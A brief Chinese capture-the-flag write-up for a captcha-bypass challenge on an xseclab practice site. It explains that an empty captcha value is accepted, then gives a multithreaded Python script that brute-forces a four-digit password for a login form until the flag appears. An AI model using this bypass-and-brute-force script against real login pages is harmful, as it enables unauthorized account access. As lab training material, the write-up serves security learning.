很无语的解题思路:验证码使用一次后就会失效,这句话意思是不需要使用验证码也可以,即验证码为空串。所以表单中vcode=""
更快的暴力方法是用多线程
代码参考https://www.freesion.com/article/53961309685/
import requests, threading
url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php'
login = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php'
header = {'Referer': 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'}
s = requests.session()
r1 = s.get(url)
curtask = 1000
maxtask = 9999
flag = False
lock = threading.Lock()
def thread_run():
global curtask, lock, flag
while not flag:
lock.acquire()
mytask = curtask
curtask = curtask + 1
lock.release()
if(mytask > maxtask):
break
res = s.post(url=login,data={
'username': 'amdin',
'pwd': mytask,
'vcode':"",
'submit':'submit'
},headers=header)
res.encoding = res.apparent_encoding
print(res.text + " " + str(flag))
if 'key' in res.text:
print('key is finding')
flag = True
threadnum = 10
threadList = []
for i in range(threadnum):
threadList.append(threading.Thread(target=thread_run))
for i in threadList:
i.start()